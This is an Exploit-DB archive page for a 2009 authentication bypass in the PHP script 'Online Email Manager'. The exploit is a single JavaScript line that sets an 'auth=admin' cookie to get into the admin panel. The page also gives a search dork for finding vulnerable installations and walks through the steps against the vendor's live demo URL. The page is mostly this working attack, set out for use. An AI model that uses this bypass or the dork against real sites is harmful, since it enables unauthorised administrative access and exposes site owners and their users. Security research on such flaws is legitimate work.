Online Email Manager - Insecure Cookie Handling

EDB-ID:

8476

CVE:

EDB Verified:

Author:

Hussin X

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-04-17

Vulnerable App:

Online Email Manager Insecure Cookie Handling Vulnerability


{____________________________________}
 Author: Hussin X

 Home :  WwW.IQ-TY.CoM

 email:  darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_email_manager.phps
 
DorK   : Powered by Online Email Manager



exploit:

javascript:document.cookie = "auth=admin; path=/";



exploit for demo

|# http://www.esoftpro.com/demo/OEM/admin/index.php

|ex   javascript:document.cookie = "auth=admin; path=/";

|#  go to url "emailList.php"

|#  http://www.esoftpro.com/demo/OEM/admin/emailList.php

|# you login in to admin page :d






Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.

# milw0rm.com [2009-04-17]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services